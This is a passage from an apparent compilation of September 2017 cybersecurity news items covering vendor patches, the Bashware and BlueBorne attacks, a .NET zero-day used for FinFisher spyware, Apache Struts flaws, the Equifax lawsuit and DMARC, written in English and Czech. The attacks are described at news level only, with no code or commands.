For example, the Idaho National Laboratory has been tasked with developing a technique that will help secure firmware on the embedded systems used by field devices, and the Los Alamos National Laboratory will work on designing a quantum secure communication operational network.

The Pacific Northwest National Laboratory has been assigned six projects, including one for developing blockchain cybersecurity technology for distributed energy resources at the edge of the grid.

“These technologies are expected to have broad applicability to the U.S. energy delivery sector by meeting the needs of the energy sector in a cost-effective manner with a clear path for acceptance by asset owners and operators,” said the Energy Department.

While the energy sector in the United States has not suffered damaging attacks such as the ones that hit Iran, Saudi Arabia and Ukraine, organizations in this sector and the Energy Department itself have fallen victim to cyberattacks.

The most recent report on such attacks is from security firm Symantec and it describes the activities of Russia-linked cyberspies that may have gained access to control systems housed by energy facilities.


SAP Resolves 16 Vulnerabilities with September 2017 Patches

13.9.2017 securityweek  Vulnerebility
SAP on Tuesday released 16 security notes as part of its SAP Security Patch Day, to which it also added 1 out-of-band release and 6 updates to previously released Security Notes, for a total of 23 Notes.

Three of this month’s Security Notes were rated High severity, 17 were rated Medium risk, and three were assessed with Low impact. The highest CVSS score of the vulnerabilities is 8.1, the German software corporation explains in an advisory.

Impacted products include SAP Point of Sale (POS), SAP NetWeaver, e-Rrecruiting, Adobe Document Services, SAP Netweaver, Web Dynpro ABAP, SAPGUI for HTML, Web Dynpro Java, BIWorkspace, SAP Note Assistant, TREX / BWA, SAP BI mobile application, and SAP ASE Installer, among other.

SAP’s September 2017 patch update also includes 10 Support Package Notes in addition to said 23 SAP Security Patch Day Notes, with 9 of all the patches being updates to previously released Security Notes, ERPScan, a company that specializes in securing SAP and Oracle applications, reveals.

The company also points out that Cross-Site Scripting represented the most common type of addressed vulnerabilities (8 out of 33). Other bug types included: Missing Authorization Check (7), implementation flaws (5), and information disclosure (4). SAP also addressed open redirect, SQL injection, cross-site request forgery, XML external entity, denial of service, hardcoded credentials, and authentication bypass vulnerabilities.

The most important of this month’s patches address vulnerabilities in SAP Point of Sale (POS) Retail Xpress Server. A missing authentication check was initially addressed in July, but the implemented check could be bypassed, so SAP released an out-of-band patch on August 18. The company included the update and new patch in the new Security Patch Day Notes.

One of the addressed bugs was an email verification bypass in SAP E-Recruiting, disclosed by SEC Consult Vulnerability Lab. The researchers discovered that the confirmation link received during the application registration contains parameters representing an incremental user ID and a random value that is not bound to the current registration. Thus, an attacker could guess the user ID and use a known value to register email addresses they didn’t have access to.

Two of the notes released this month affect a single country each. They address a Cross-Site Request Forgery (CSRF) vulnerability in Electronic Ledger Management for Turkey 1.0 and a Missing Authority Check in a function for Brazilian invoicing features (Electronic Nota Fiscal, NF-e), Onapsis, another company focused on security SAP and Oracle software, points out.

SAP also announced plans to deliver all SAP Notes files with digital signature to improve security. Because the SAP Notes files can get maliciously modified before being delivered to customers, the new feature will ensure increased authenticity and improved security.

“The digitally signed SAP Notes will be available as SAR files. To ensure authenticity of the delivered SAP Notes files, Note Assistant tool (transaction SNOTE) needs to be enabled to upload digitally signed SAP Notes having ABAP corrections,” SAP says.

Customers interested in enabling Note Assistant to upload digitally signed SAP Notes need to implement SAP Security Note 2408073. The note enables digital signature verification feature only for uploading digitally signed SAP Notes. The feature to download the digitally signed notes will be implemented in the coming months.

“SAP Security Response Team hereby also announces that SAP plans to become a CVE Numbering Authority by the end of 2017. Using CVE as a mechanism to disclose patches to vulnerabilities reported by external sources, SAP will facilitate faster patch consumption and transparency for all SAP Customers,” the company also revealed.


Serious Flaws Found in IBM InfoSphere Products

13.9.2017 securityweek  Vulnerebility
IT security services company SEC Consult on Wednesday disclosed the details of several unpatched vulnerabilities affecting IBM’s InfoSphere DataStage and Information Server data integration tools.

The flaws were reported to the vendor on May 23, but patches still haven’t been released. However, IBM has published advisories for each of the issues, providing recommendations on how to mitigate potential attacks.

SEC Consult discovered the vulnerabilities, which it has collectively classified as critical, in InfoSphere DataStage 11.5, but IBM determined that they also impact InfoSphere Information Server and DataStage versions 9.1, 11.3 and 11.5.

The most serious of the flaws, based on the 8.4 CVSS score assigned by IBM, is CVE-2017-1468. The security hole exists because the Director and Designer clients don’t check file signatures before loading and running executable files, allowing a local attacker to place arbitrary executable files in installation directories and escalate privileges.

Another high severity vulnerability is CVE-2017-1467, a weak authorization issue that allows attackers to execute arbitrary system commands.

“An unauthorized user could intercept communication between client and server, and replay certain DataStage commands without privileged access,” IBM said in its advisory.

An XML External Entity (XXE) injection vulnerability that can be exploited by a remote attacker to obtain arbitrary files from the client system (CVE-2017-1383) has also been classified as high severity.

Researchers also discovered that privileged users can trigger a memory dump that could contain highly sensitive information in clear text, including credentials. IBM was also informed that the application loads DLL files from its home directory without verifying them, which could lead to arbitrary code execution.

While patches have not been released for these security holes, IBM has provided mitigation advice for a majority of the issues - mitigations for the DLL hijacking flaw will be made available by November 30.

The tech giant told SEC Consult that the vulnerabilities will be addressed in a new client interface the company is working on.

“SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all vulnerabilities in the Remote Management platform and increase the security for its customers,” SEC Consult said in its advisory.


Bashware attack, how to run Linux malware on Windows systems
13.9.2017 securityaffairs Attack

Experts found a new alarming method dubbed Bashware attack that allows attackers to silently run malware to bypass even the most common security solutions,
The new Windows 10 feature Windows Subsystem for Linux (WSL) that implements the Linux bash terminal in Microsoft operating system could be exploited by malware to run undetected.

The feature was recently included in beta versions and it will be available for all users in the upcoming Windows 10 Fall Creators Update (FCU), set to be released by Microsoft in October 2017.

According to Because researchers with security firm Check Point, a malware designed for Linux can run undetected on Windows systems.

Bashware Linux of Windows

The new attack technique was dubbed Bashware, it allows the malicious code to evade the detection of antivirus solutions written for Windows, for this reason, it could be implemented also by Linux malware.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time.” reads the analysis published by Check Point. “This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms.”

Below a video PoC of the Bashware attack:

Security researchers have demonstrated that the Bashware attack goes undetected with most of the security solutions, it may potentially affect more of 400 million Windows systems that already run Windows 10 PC.

“Bashware is so alarming because it shows how easy it is to take advantage of the WSL mechanism to allow any malware to bypass security products. We tested this technique on most of the leading anti-virus and security products on the market, successfully bypassing them all. This means that Bashware may potentially affect any of the 400 million computers currently running Windows 10 PC globally.” continues the analysis.

According to the experts, the risk is anyway limited because the WSL feature must be explicitly enabled by the Windows user, it is disabled by default.

Check Point also added that the WSL could be silently enabled in the background, allowing the malware to run.

Microsoft downplayed the risks to end-users because the feature is disabled by default.


Canadian Class Action Suit Launched Against Equifax Over Data Breach

13.9.2017 securityweek CyberCrime
A class action lawsuit by Canadian consumers whose data was stolen in a massive hack of US credit bureau Equifax was launched Tuesday, seeking damages of Can $550 billion ($450 billion US).

The proposed class action includes all residents of Canada whose information was stored on Equifax databases and was accessed without authorization between May 1, 2017 and August 1, 2017, according to a statement by the Toronto-based Sotos law firm.

The hack was disclosed last week by Equifax, one of the three major credit bureaus that collect consumer financial data, and potentially affects 143 million US customers, as well as an as yet unspecified number of Canadian and British customers.

The breach is considered one of the worst-ever because of the nature of data collected: bank and social security numbers and personal information of value to hackers and others.

"Equifax set up a dedicated website to provide information to US customers who may have been affected, but there is no way for Canadians to identify if they were affected," said lawyer Jean-Marc Leclerc.

"Fighting identity theft takes years, during which a consumer's ability to obtain anything with credit is compromised: purchasing a house, renting an apartment or obtaining a credit card or line of credit, for example."

The claim alleges that Equifax breached its contract with class members as well as their privacy rights and was negligent in handling their information.

Some reports have suggested Equifax data was being sold on "dark web" marketplaces, but analysts said it was too soon to know who was behind the attack and the motivation.


.NET Zero-Day Flaw Exploited to Deliver FinFisher Spyware

13.9.2017 securityweek Vulnerebility
One of the vulnerabilities patched by Microsoft with this month’s security updates is a zero-day flaw exploited by threat actors to deliver FinFisher malware to Russian-speaking individuals.

The vulnerability, reported to Microsoft by researchers at FireEye, is tracked as CVE-2017-8759 and it affects the .NET framework, specifically a SOAP WSDL (Web Services Description Language) parser. An attacker can exploit the security hole for remote code execution by getting the targeted user to open a specially crafted document or application.

In the attacks observed by FireEye, a threat actor exploited the vulnerability via malicious documents that download several components before deploying the final payload – a variant of FinFisher.

FinFisher, also known as FINSPY and WingBird, is a lawful interception tool whose developer claims is only sold to governments. However, researchers discovered on numerous occasions that the spyware has been used by countries that have a bad reputation when it comes to human rights and civil liberties.

In the recent attacks seen by FireEye, a threat actor delivered the spyware via a document named “Проект.doc” (“project” in Russian). The security firm stated, with moderate confidence, that a state-sponsored group launched the attack in an effort to spy on Russian-speaking users.

“[This variant of FinFisher] leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult,” FireEye researchers said in a blog post. “As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames.”

Microsoft has linked the attack to a group it tracks as NEODYMIUM, which last year used a Flash Player zero-day vulnerability to deliver FinFisher.

While Microsoft’s advisory for CVE-2017-8759 contains little information, FireEye’s blog post includes many technical details.

Earlier this year, Kaspersky noticed the FinFisher malware being delivered via a Microsoft Office zero-day (CVE-2017-0199) by a Middle Eastern threat actor named “BlackOasis.” FireEye also spotted attacks exploiting CVE-2017-0199 to deliver FinFisher earlier this year, and the security firm believes CVE-2017-8759 may have also been used by other groups, although currently there is no evidence to support this theory.


Linux Malware Could Run Undetected on Windows: Researchers

13.9.2017 securityweek Virus
A new Windows 10 feature that makes the popular Linux bash terminal available for Microsoft’s operating system could allow for more malware families to target the operating system, Check Point researchers claim.

Called Windows Subsystem for Linux (WSL), the feature exited beta a couple of months ago and is set to become available to all users in the upcoming Windows 10 Fall Creators Update (FCU), set to be released by Microsoft in October 2017.

The feature brings the Linux command-line shell to Windows, thus allowing users to natively run Linux applications on Windows systems. Because of that, Check Point researchers argue, malware designed for Linux can slip undetected onto Windows computers.

Called Bashware, the new attack technique could be abused even by known Linux malware, because anti-malware solutions for Windows haven’t been configured to detect such threats, the security researchers argue.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time. This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms,” Check Point says.

The security researchers claim they have already tested the attack technique on “most of the leading anti-virus and security products on the market,” and managed to successfully bypass all of them. Because of that, they claim, “Bashware may potentially affect any of the 400 million computers currently running Windows 10 PC globally.”

The risks posed by WSL, however, are mitigated by the fact that the user needs to manually enable the feature and reboot the system. Malware that wants to abuse the feature would need to enable developer mode on Windows, which is disabled by default, and even download and extract the Linux file system from Microsoft’s servers.

Check Point says the necessary features could be silently enabled in the background, thus setting up the necessary environment without user’s knowledge. Moreover, they say they were able to run Windows-based malware in the newly set up environment.

The researchers also point out that the newly discovered attack technique doesn’t leverage an implementation flaw, but that the lack of awareness by various security vendors is the actual issue here.

“However, we believe that it is both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware,” Check Point says.

According to Microsoft, however, the risks posed by such an attack are low, given that the features required to run Linux apps on Windows are disabled by default.

“We reviewed and assessed this to be of low risk. One would have to enable developer mode, then install the component, reboot, and install Windows Subsystem for Linux in order for this to be effective. Developer mode is not enabled by default,” a Microsoft spokesperson told SecurityWeek via email.

Contacted by SecurityWeek, anti-malware vendor Kaspersky Lab confirmed in an emailed statement that they are aware of the potential risks posed by WSL and that they are already working on the technology necessary to detect any malware that could abuse it.

“Kaspersky Lab is aware of the possibility to create malware for Windows Subsystem for Linux (WSL) and is working on technologies to detect this type of malware on user devices. In fact, in 2018, all Kaspersky Lab solutions for Windows will be updated with special technologies that detect behaviorally and heuristically and block any Linux and Windows threats when WSL mode is on. Currently, all Kaspersky Lab frontline solutions for Windows can detect downloaders and Windows parts of Linux malware,” Kaspersky Lab said.


Správu všech platforem koncových zařízení umožní novinka VMwaru

13.9.2017 SecurityWorld Zabezpečení
Workspace One, podle výrobce první řešení jednotného uživatelského prostředí s podporou správy a zabezpečení pro všechny platformy koncových zařízení, představil VMware.

Workspace One s integrovaným řešením AirWatch, který umožňuje poskytování jednotného uživatelského prostředí, jeho správu a zabezpečení na všech platformách koncových zařízení, ukázal VMware.

Řešení je dostupné s ověřováním identity uživatelů a poskytuje uživatelský komfort a jednoduchost na úrovni spotřebitelských řešení a zároveň zabezpečení podnikové třídy. A pomocí technologie Horizon pro virtualizaci aplikací a desktopů rozšíří totožné prostředí a zabezpečení i na tradiční systémy Windows.

Firmy tak podle výrobce budou moci využít Workspace One jako jediné řešení pro komplexní správu koncových bodů (UEM) a sjednotit uživatelské prostředí na všech platformách pro koncová zařízení včetně systémů Windows, macOS, Chrome OS, iOS a Android.

Mimo to Workspace One nově obsahuje i rozhraní pro programování aplikací (API) od významných poskytovatelů platforem pro koncová zařízení.

Workspace One poskytuje koncovým uživatelům plně samoobslužné řešení, od zavádění nových zařízení do systému po produktivní využití. Zaměstnanec může dostat nový notebook a začít jej užívat během několika minut díky připojení do podnikových systémů ihned po prvním spuštění a samoobslužným aplikacím.

Tento nový přístup eliminuje složitý, nákladný a k chybám náchylný model správy desktopů a zvyšuje bezpečnost díky schopnosti prostřednictvím cloudu izolovat a aktualizovat libovolné zařízení v reálném čase. Stejný princip a bezpečnostní model nabízí řešení Workspace ONE i pro operační systémy Windows 10 a macOS.

Workspace ONE nabídne také distribuci softwaru založenou na cloudové technologii typu peer-to-peer (P2P) pro instalaci objemných aplikací na velký počet PC, která se nachází v různých lokalitách. Tím odpadá potřeba nákladných pobočkových serverů, které vyžadují samostatnou správu infrastruktury.

Virtuální desktopová infrastruktura Horizon 7 integrovaná s platformou VMware Cloud Foundation a řešením Dell EMC VDI Complete spolu s Horizon Apps navíc spojují správu výpočetních, úložných a síťových zdrojů a infrastruktury. Tím odpadá potřeba detailního plánování a podrobného přehledu o provozu jednotlivých prvků infrastruktury.

Spolu s cloudovou službou Horizon Cloud tak firmy mají k dispozici infrastrukturu pro lokální i cloudovou implementaci. Správu desktopů a aplikací Windows lze navíc automatizovat pomocí platformy VMware Just in Time Management Platform (JMP) a technologického preview, které technologie platformy JMP (Instant Clone, VMware App Volumes a User Environment Manager) integruje do jedné řídicí konzoly, což správu výrazně usnadňuje.

Novinkou je i Workspace One Intelligence, což je doplňková služba, která poskytuje ucelený přehled a umožňuje provádět automatizované úkony. Jejím smyslem je zrychlit plánování, zvýšit bezpečnost a zlepšit komfort pro uživatele. Integrované funkce pro nastavení a uplatňování pravidel zákazníkům umožní automatizovat činnosti, které zajistí ochranu a optimalizaci výkonu v reálném čase, což starší systémy neumožňují.


Analytika s biometrií: Klíč k budoucí ochraně dat

13.9.2017 SecurityWorld Zabezpečení
Podle zprávy společnosti Accenture biometrie a pokročilé analýzy revolučním způsobem změní to, jak se řeší zabezpečení dat a otázky ochrany osobních údajů.

Zpráva Nově vznikající technologie ve veřejných službách (Emerging Technologies in Public Service) zkoumá zavádění nově vznikajících technologií ve státních úřadech, které mají přímou interakcí s občany nebo které mají největší odpovědnost za služby občanům. Mezi ně patří například zdravotnické a sociální služby, policie a justice, daňové úřady, pohraniční služba, či důchodové a sociální zabezpečení.

Tyto technologie zahrnují pokročilé analýzy, prediktivní modelování, internet věcí, inteligentní automatizaci, analýzu videa, analýzu biometrických a jiných identifikačních znaků, strojové učení a porozumění počítačů přirozenému jazyku.

Na názory se Accenture ptala lidí v Evropě, severní Americe a Tichomoří. Velmi kladně je zapojování nových technologií vnímáno zejména daňovými úřady (84 %) a správou sociálního zabezpečení (76 %). Kladou důraz zejména na snižování rizika a zlepšování prevence podvodů díky zavádění analytických a biometrických technologií. Velké výhody při zapojení nových technologií očekávají také zástupci pohraniční stráže (68 %).

Výsledky průzkumu též ukazují, že 71 % respondentů v současné době nasazuje pokročilé analýzy a řešení prediktivního modelování. Odvětví, která uvádějí nejvyšší úroveň zavádění řešení datových analýz, jsou daňové a sociální služby (81 % a 80 %), dále pohraniční služba (74 %) a úřady zajištující veřejnou bezpečnost (62 %).

Více než dvě třetiny (69 %) všech respondentů řekly, že zavádějí nebo uvažují o zavádění biometrických technologií. Je zajímavé, že i když téměř dvě třetiny (62 %) respondentů uvedly, že jsou obeznámeny s analýzami videa, méně než jedna třetina (28 %) uvedla, že jejich úřady tato řešení zavádějí.

Sektor, který zaznamenal nejvyšší procento přijetí biometrických technologií, je veřejná bezpečnost (51 %). Následují respondenti z penzijních úřadů a úřadů sociálního zabezpečení (48 %) a pohraniční úřady (36 %). Studie ukazuje, že biometrická řešení jsou vysoce poptávaná a široce užívaná; nejčastěji se zavádějí e-pasy a rozpoznávání oční duhovky. To dokazuje i to, že téměř dvě třetiny (65 %) respondentů průzkumu uvedly, že zkoušejí, zavádějí nebo provádějí výzkum biometrických analýz a analýz identity.

„Bezpečnostní řešení na bázi biometrie působící v kombinaci s analytickými technologiemi nabízejí vládním úřadům účinné a dříve nedostupné možnosti identifikace a ověřování v reálném čase a posilují jak bezpečnost, tak pochopení údajů,“ řekl Ger Daly, který v Accenture vede oddělení zaměřené na sektor obrany a veřejné bezpečnosti. „To umožňuje poskytovat novou úroveň služeb a formuje vládní služby zaměřené na občana, ne na instituci.“

Postřehy z jednotlivých zemí

Otázky bezpečnosti dat a ochrany osobních údajů byly vyhodnoceny jako největší výzvy ve všech devíti dotazovaných zemích. U respondentů z Velké Británie a Německa bylo nejméně časté, že by zde byly obavy o ochranu a bezpečnost osobních údajů (14 % a 15 %).
Respondenti v Austrálii a Singapuru nejčastěji zavádějí biometrické technologie (68 % v obou zemích), zatímco země s nejnižší mírou přijetí je Finsko (22 %).
Respondenti z USA nejčastěji uváděli, že zavádění biometrie by mohlo snížit riziko a zlepšit bezpečnost dat a soukromí (51 %), oproti respondentům z Japonska, u kterých je nejméně pravděpodobné, že budou zastávat tento názor (12 %).
Respondenti z Austrálie (48 %) a Francie (45 %) nejvíce uváděli, že zavádění datové analýzy by mohlo snížit riziko a zlepšit bezpečnost dat. V USA zastávali tento názor nejméně, a to pouze ve 2 %.
Respondenti v Japonsku více než v jakékoliv jiné zemi používají videoanalýzy (43 %), zatímco respondenti z Německa byli ti, kteří přijímají tuto technologii nejméně (18 %).
Úřady v Austrálii a Singapuru zavádějí biometrii a technologie analýzy identity nejvíce, a to z 68 %, následuje Japonsko (57 %), Francie (42 %) a Velká Británie (34 %).


BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking
12.9.2017 thehackernews Attack
If you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side.
Security researchers have just discovered total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices—from Android, iOS, Windows and Linux to the Internet of things (IoT) devices—using the short-range wireless communication technology.
Using these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed BlueBorne, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks without requiring any victim interaction.
All an attacker need is for the victim's device to have Bluetooth turned on and obviously, in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device.
BlueBorne: Wormable Bluetooth Attack

What's more worrisome is that the BlueBorne attack could spread like the wormable WannaCry ransomware that emerged earlier this year and wrecked havoc by disrupting large companies and organisations worldwide.
Ben Seri, head of research team at Armis Labs, claims that during an experiment in the lab, his team was able to create a botnet network and install ransomware using the BlueBorne attack.

However, Seri believes that it is difficult for even a skilled attacker to create a universal wormable exploit that could find Bluetooth-enabled devices, target all platform together and spread automatically from one infected device to others.
"Unfortunately, this set of capabilities is extremely desireable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet," Armis said.
"The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure "air-gapped" networks which are disconnected from any other network, including the internet."
Apply Security Patches to Prevent Bluetooth Hacking
The security firm responsibly disclosed the vulnerabilities to all the major affected companies a few months ago—including Google, Apple and Microsoft, Samsung and Linux Foundation.
These vulnerabilities include:
Information Leak Vulnerability in Android (CVE-2017-0785)
Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service
Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile
The Bluetooth Pineapple in Android—Logical flaw (CVE-2017-0783)
Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)
Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)
The Bluetooth Pineapple in Windows—Logical flaw (CVE-2017-8628)
Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)
Google and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe.
“Microsoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.” – a Microsoft spokesperson said.
What's worst? All iOS devices with 9.3.5 or older versions and over 1.1 Billion active Android devices running older than Marshmallow (6.x) are vulnerable to the BlueBorne attack.
Moreover, millions of smart Bluetooth devices running a version of Linux are also vulnerable to the attack. Commercial and consumer-oriented Linux platform (Tizen OS), BlueZ and 3.3-rc1 are also vulnerable to at least one of the BlueBorne bugs.
Android users need to wait for security patches for their devices, as it depends on your device manufacturers.
In the meantime, they can install "BlueBorne Vulnerability Scanner" app (created by Armis team) from Google Play Store to check if their devices are vulnerable to BlueBorne attack or not. If found vulnerable, you are advised to turn off Bluetooth on your device when not in use.


Samsung Launches Bug Bounty Program — Offering up to $200,000 in Rewards
12.9.2017 thehackernews Security

With the growing number of cyber attacks and data breaches, a number of tech companies and organisations have started Bug Bounty programs for encouraging hackers, bug hunters and researchers to find and responsibly report bugs in their services and get rewarded.
Samsung is the latest in the list of tech companies to launch a bug bounty program, announcing that the South Korean electronics giant will offer rewards of up to $200,000 to anyone who discovers vulnerabilities in its mobile devices and associated software.
Dubbed Mobile Security Rewards Program, the newly-launched bug bounty program will cover 38 Samsung mobile devices released from 2016 onwards which currently receive monthly or quarterly security updates from the company.
So, if you want to take part in the Samsung Mobile Security Rewards Program, you have these devices as your target—the Galaxy S, Galaxy Note, Galaxy A, Galaxy J, and the Galaxy Tab series, as well as Samsung's flagship devices, the S8, S8+, and Note 8.
"We take security and privacy issues very seriously; and as an appreciation for helping Samsung Mobile improve the security of our products and minimizing risk to our end-consumers, we are offering a rewards program for eligible security vulnerability reports," the company explains on its bug bounty website.
"We look forward to your continued interests and participations in our Samsung Mobile Security Rewards Program. Through this rewards program, we hope to build and maintain valuable relationships with researchers who coordinate disclosure of security issues with Samsung Mobile."
Not just mobile devices, the tech giant's Mobile Services suite is also part of its bug bounty program, which will also cover apps and services such as Bixby, Samsung Account, Samsung Pay, Samsung Pass, among others.
For the eligibility of a reward, researchers and bug hunters need to provide a valid proof-of-concept (PoC) exploit that can compromise a Samsung handset without requiring any physical connection or third-party application.
The company will evaluate the reward depending on the severity level of the vulnerability (Critical, High, Moderate, and Low) and its impact on devices. The least reward is $200, which is for low-severity flaws, while the highest reward is $200,000, which is for critical bugs.
The Higher reward will be offered for bugs that lead to trusted execution environment (TEE) or Bootloader compromise. The level of severity will be determined by Samsung.
Samsung’s bounty of $200,000 is equal to the bounty reward offered under Apple's bug bounty program but is slightly lower than Microsoft's newly launched bounty program that offers $250,000 for Windows 10 security bugs.
Following the path of major tech companies, the non-profit group behind Tor Project recently joined hands with HackerOne to launch its own bug bounty program, with the highest payout for the flaws has been kept $4,000.
So, what you are waiting for? Hunt for bugs in Samsung products and submit your findings to the company via the Security Reporting page.


Apache Struts 2 Flaws Affect Multiple Cisco Products
12.9.2017 thehackernews Vulnerebility
After Equifax massive data breach that was believed to be caused due to a vulnerability in Apache Struts, Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts2 web application framework.
Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and used by 65 percent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS.
However, the popular open-source software package was recently found affected by multiple vulnerabilities, including two remote code execution vulnerabilities—one discovered earlier this month, and another in March—one of which is believed to be used to breach personal data of over 143 million Equifax users.
Some of Cisco products including its Digital Media Manager, MXE 3500 Series Media Experience Engines, Network Performance Analysis, Hosted Collaboration Solution for Contact Center, and Unified Contact Center Enterprise have been found vulnerable to multiple Apache Struts flaws.
Cisco Launches Apache Struts Vulnerability Hunting
Cisco is also testing rest of its products against four newly discovered security vulnerability in Apache Struts2, including the one (CVE-2017-9805) we reported on September 5 and the remaining three also disclosed last week.
However, the remote code execution bug (CVE-2017-5638) that was actively exploited back in March this year is not included by the company in its recent security audit.
The three vulnerabilities—CVE-2017-9793, CVE-2017-9804 and CVE-2017-9805—included in the Cisco security audit was released by the Apache Software Foundation on 5th September with the release of Apache Struts 2.5.13 which patched the issues.
The fourth vulnerability (CVE-2017-12611) that is being investigated by Cisco was released on 7th September with the release of Apache Struts 2.3.34 that fixed the flaw that resided in the Freemarker tag functionality of the Apache Struts2 package and could allow an unauthenticated, remote attacker to execute malicious code on an affected system.
Apache Struts Flaw Actively Exploited to Hack Servers & Deliver Malware
Coming on to the most severe of all, CVE-2017-9805 (assigned as critical) is a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them.
This could allow a remote, unauthenticated attacker to achieve remote code execution on a host running a vulnerable version of Apache Struts2, and Cisco's Threat intelligence firm Talos has observed that this flaw is under active exploitation to find vulnerable servers.
Security researchers from data centre security vendor Imperva recently detected and blocked thousands of attacks attempting to exploit this Apache Struts2 vulnerability (CVE-2017-9805), with roughly 80 percent of them tried to deliver a malicious payload.
The majority of attacks originated from China with a single Chinese IP address registered to a Chinese e-commerce company sending out more than 40% of all the requests. Attacks also came from Australia, the U.S., Brazil, Canada, Russia and various parts of Europe.
Out of the two remaining flaws, one (CVE-2017-9793) is again a vulnerability in the REST plug-in for Apache Struts that manifests due to "insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application."
This flaw has been given a Medium severity and could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on targeted systems.
The last flaw (CVE-2017-9804) also allows an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system but resides in the URLValidator feature of Apache Struts.
Cisco is testing its products against these vulnerabilities including its WebEx Meetings Server, the Data Center Network Manager, Identity Services Engine (ISE), MXE 3500 Series Media Experience Engines, several Cisco Prime products, some products for voice and unified communications, as well as video and streaming services.
At the current, there are no software patches to address the vulnerabilities in Cisco products, but the company promised to release updates for affected software which will soon be accessible through the Cisco Bug Search Tool.
Since the framework is being widely used by a majority of top 100 fortune companies, they should also check their infrastructures against these vulnerabilities that incorporate a version of Apache Struts2.


Adobe Patches Two Critical Flaws in Flash Player

12.9.2017 securityweek  Vulnerebility
Adobe has patched only two vulnerabilities in Flash Player this month, but they can both be exploited for remote code execution and both have been classified as critical.

The flaws, tracked as CVE-2017-11281 and CVE-2017-11282, were discovered by Mateusz Jurczyk and Natalie Silvanovich of Google Project Zero in Flash Player 26.0.0.151 and earlier. The security holes are caused by memory corruption issues.

Adobe said there was no evidence that either of the two flaws had been exploited in attacks before the patches were released. Adobe and several tech giants have decided to kill Flash Player by the end of 2020.

The company has also released patches for a couple of vulnerabilities affecting the Windows version of its help authoring tool RoboHelp. RoboHelp 2017.0.1 and earlier and 12.0.4.460 and earlier are affected by an important input validation flaw that can be exploited for cross-site scripting (XSS) attacks, and a moderate-severity unvalidated URL redirect issue that can be leveraged for phishing attacks.

Reynold Regan of the CNSI - Center for Technology & Innovation in Chennai has been credited for reporting the weaknesses to Adobe.

Security updates have also been released for ColdFusion 11 and 2016 to address a critical XML parsing vulnerability and an XSS flaw that can lead to information disclosure. The updates also include mitigations designed to prevent remote code execution via unsafe Java deserialization.

Nick Bloor of NCC Group, Daniel Sayk of Telekom Security, and Daniel Lawson of Depth Security have reported these flaws to Adobe.


DMARC in Higher Education: A Formidable Defense Against Targeted Scams

12.9.2017 securityweek Phishing
DMARC Can Be Effective in Defending Against Targeted Phishing Attacks And Student Loan Scams

As the new academic year starts, so starts the "Fresher" phishing scam. Second year students are also targeted, but the new first year university intake is the most vulnerable. It has already begun in the UK where the year starts earlier than in the U.S. -- but will follow wherever there are new students who rely on loans.

ActionFraud, which recently issued a warning, is operated by the City of London Police, the lead agency for action against fraud in the UK. The phishing campaign has leveraged the Student Loan Company (SLC), which governs loans to students. The phishing email claims that there is a problem with the loan, and that new students should log into their account (on a phishing site) to update their information.

"Because tens of thousands of students will be starting university this month," warns John Wilson, field CTO at Agari, "cyber criminals can send out broad, untargeted phishing campaigns to huge databases and be confident they will reach a large number of victims."

Phishing Scams Target Universitities

But there is a solution to this type of phishing, where the scammer pretends to be a specific organization -- such as the SLC or a particular university. Those organizations should implement Domain-based Message Authentication, Reporting and Conformance (DMARC).

DMARC effectively whitelists the genuine emails from genuine domains, so that ISPs and receiving organizations (such as universities) can reject or block spoofed mails. "DMARC is an open source email authentication standard that will reject unauthorized messages using the domain, preventing them from ever being delivered," explains Wilson.

The UK government is a big supporter, and DMARC is used, for example, by the UK tax office (HMRC). Last year, Ian Levy, technical director of the National Cyber Security Centre (NCSC, part of GCHQ) said that all 5,700 domains used by the UK government will be adopting DMARC. Once this is achieved, he intends to apply pressure on industry in general to force them to do the same. "I'm going to point and laugh at everybody who doesn't do the same -- publicly," said Levy. "Because there is no excuse not to do DMARC on a high value domain anymore."

